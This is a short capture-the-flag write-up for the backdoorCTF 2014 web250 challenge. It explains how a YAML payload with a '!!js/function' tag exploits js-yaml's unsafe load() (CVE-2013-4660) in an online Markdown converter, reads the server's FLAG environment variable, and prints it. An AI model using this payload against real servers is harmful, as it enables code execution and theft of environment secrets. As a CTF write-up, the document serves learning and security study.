Quantcast
Channel: scoding.de
Viewing all articles
Browse latest Browse all 21

backdoorCTF 2014 WriteUp – web250

$
0
0

We are presented with an online Markdown to HTML converter supporting yaml and the link to the source code.

2014-03-23-170044_1311x710_scrot
In the source code on https://github.com/backdoor-ctf/web250 we find the variable process.env.FLAG in the file app.js.

To read the variable we create a javascript function exploiting a vulnerability of the load() function of js-yaml (CVE2013-4660).

---
a: !!js/function function(){ return(process.env.FLAG) }()
---
{{a}}

Converting this prints out the flag:

fb1f85e4f37eb3bf31141cb1dcce1caf

The post backdoorCTF 2014 WriteUp – web250 appeared first on scoding.de.


Viewing all articles
Browse latest Browse all 21

Latest Images

Trending Articles





Latest Images